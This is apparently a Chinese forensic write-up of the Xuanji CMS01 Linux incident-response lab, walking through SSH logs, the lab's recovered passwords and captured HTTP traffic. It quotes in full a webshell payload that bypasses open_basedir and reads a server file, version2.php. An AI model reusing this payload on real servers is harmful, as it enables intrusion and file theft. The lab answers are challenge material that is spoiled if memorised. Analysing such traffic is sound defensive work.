Looking for light.

Archive

About

Xiaodi

玄机——linux实战-CMS01

上线后我们首先查看SSH的日志。处于/var/log/secure内。分析日志我们发现可疑IP

[root@ip-10-0-10-4 log]# cat secure
Mar 20 10:30:24 web-server sshd[1054]: Received SIGHUP; restarting.
Mar 20 10:30:24 web-server sshd[1054]: Server listening on 0.0.0.0 port 22.
Mar 20 10:30:24 web-server sshd[1054]: Server listening on :: port 22.
Mar 20 10:30:25 web-server sshd[4111]: Accepted publickey for root from 127.0.0.1 port 55976 ssh2: ED25519 SHA256:5wjncpQo9MtvNtk8t3A1CdOx2horMhYTghdrKk4ey0k
Mar 20 10:30:25 web-server sshd[4111]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 10:30:25 web-server sshd[1054]: Received SIGHUP; restarting.
Mar 20 10:30:25 web-server sshd[1054]: Server listening on 0.0.0.0 port 22.
Mar 20 10:30:25 web-server sshd[1054]: Server listening on :: port 22.
Mar 20 10:30:38 web-server sshd[4111]: pam_unix(sshd:session): session closed for user root
Mar 20 10:30:50 web-server sshd[4269]: Did not receive identification string from 127.0.0.1 port 55998
Mar 20 14:29:37 web-server polkitd[729]: Loading rules from directory /etc/polkit-1/rules.d
Mar 20 14:29:37 web-server polkitd[729]: Loading rules from directory /usr/share/polkit-1/rules.d
Mar 20 14:29:37 web-server polkitd[729]: Finished loading, compiling and executing 2 rules
Mar 20 14:29:37 web-server polkitd[729]: Acquired the name org.freedesktop.PolicyKit1 on the system bus
Mar 20 14:29:40 web-server sshd[1057]: Server listening on 0.0.0.0 port 22.
Mar 20 14:29:40 web-server sshd[1057]: Server listening on :: port 22.
Mar 20 14:30:21 web-server sshd[2365]: Accepted password for root from 192.168.20.1 port 9509 ssh2
Mar 20 14:30:21 web-server sshd[2365]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 14:50:17 web-server sshd[3760]: Did not receive identification string from 127.0.0.1 port 46734
Mar 20 14:50:22 web-server sshd[3813]: Did not receive identification string from 127.0.0.1 port 46744
Mar 20 15:04:20 web-server sshd[2365]: Received disconnect from 192.168.20.1 port 9509:11:
Mar 20 15:04:20 web-server sshd[2365]: Disconnected from 192.168.20.1 port 9509
Mar 20 15:04:20 web-server sshd[2365]: pam_unix(sshd:session): session closed for user root
Mar 20 15:04:22 web-server sshd[4068]: Accepted password for root from 192.168.20.1 port 12423 ssh2
Mar 20 15:04:22 web-server sshd[4068]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 15:36:22 web-server sshd[4377]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.20.1  user=root
Mar 20 15:36:22 web-server sshd[4377]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by user "root"
Mar 20 15:36:25 web-server sshd[4377]: Failed password for root from 192.168.20.1 port 1378 ssh2
Mar 20 15:36:28 web-server sshd[4377]: Accepted password for root from 192.168.20.1 port 1378 ssh2
Mar 20 15:36:28 web-server sshd[4377]: pam_unix(sshd:session): session opened for user root by (uid=0)
Mar 20 15:39:14 web-server sshd[4068]: Received disconnect from 192.168.20.1 port 12423:11:
Mar 20 15:39:14 web-server sshd[4068]: Disconnected from 192.168.20.1 port 12423

提交后我们需要分析黑客修改的管理员密码。查看shadow文件,我们尝试使用hashcat爆破此root密码.但是爆破失败了,后面查看WP发现是需要改名后登录宝塔,在数据库中发现加密的password。审计源码逆向加密逻辑得到原密码Network@2020

接下来我们下载提供的流量文件,查看HTTP包我们可以发现唯一可疑的流量就是发送到index.php?user-app-register路由的流量,尝试提交提示成功了。传输的数据如下:

Network2020=@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);@array_push($oparr,$ocwd,sys_get_temp_dir());foreach($oparr as $item) {if(!@is_writable($item)){continue;};$tmdir=$item."/.9092ffb62";@mkdir($tmdir);if(!@file_exists($tmdir)){continue;}$tmdir=realpath($tmdir);@chdir($tmdir);@ini_set("open_basedir", "..");$cntarr=@preg_split("/\\\\|\//",$tmdir);for($i=0;$i<sizeof($cntarr);$i++){@chdir("..");};@ini_set("open_basedir","/");@rmdir($tmdir);break;};};;function asenc($out){return $out;};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "1a06c3"."8bac2b";echo @asenc($output);echo "322"."b090";}ob_start();try{$F=base64_decode(substr($_POST["x0b6b31b98f31d"],2));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();&x0b6b31b98f31d=JzL3d3dy93d3dyb290LzEyNy4wLjAuMS92ZXJzaW9uMi5waHA=

这下我们也能得到webshell的密码了。且分析逻辑可知此代码目的是读取version2.php的内容。那么我们直接推测上传的木马为此文件。